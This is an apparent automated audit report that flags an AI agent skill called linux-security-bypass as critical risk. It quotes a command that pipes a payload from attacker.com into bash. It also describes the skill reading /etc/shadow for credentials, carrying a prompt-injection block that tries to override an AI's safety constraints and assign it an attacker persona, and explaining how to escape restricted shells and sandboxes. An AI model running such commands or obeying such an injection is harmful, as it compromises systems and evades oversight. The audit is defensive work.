linux-security-bypass
Fail
Audited by Gen Agent Trust Hub on Apr 9, 2026
Risk Level: CRITICALREMOTE_CODE_EXECUTIONDATA_EXFILTRATIONPROMPT_INJECTIONCOMMAND_EXECUTIONEXTERNAL_DOWNLOADS
Full Analysis
- [REMOTE_CODE_EXECUTION]: Found piped execution from an untrusted source. Evidence: curl -sL https://attacker.com/payload | bash in SKILL.md.
- [DATA_EXFILTRATION]: Provides instructions to read sensitive system files, specifically /etc/shadow via git diff, which is a common technique for credential harvesting.
- [PROMPT_INJECTION]: Includes explicit instructions designed to override the AI's base model safety constraints and adopt an expert attacker persona. Evidence: AI LOAD INSTRUCTION block at the start of SKILL.md.
- [COMMAND_EXECUTION]: Documents extensive methods for bypassing security restrictions like rbash, noexec, and SELinux/AppArmor, including fileless execution via DDexec and memfd_create.
- [EXTERNAL_DOWNLOADS]: References external tools and payloads from untrusted sources, including the use of amicontained and the remote payload at attacker.com.
Recommendations
- HIGH: Downloads and executes remote code from: https://attacker.com/payload - DO NOT USE without thorough review
- AI detected serious security threats
Audit Metadata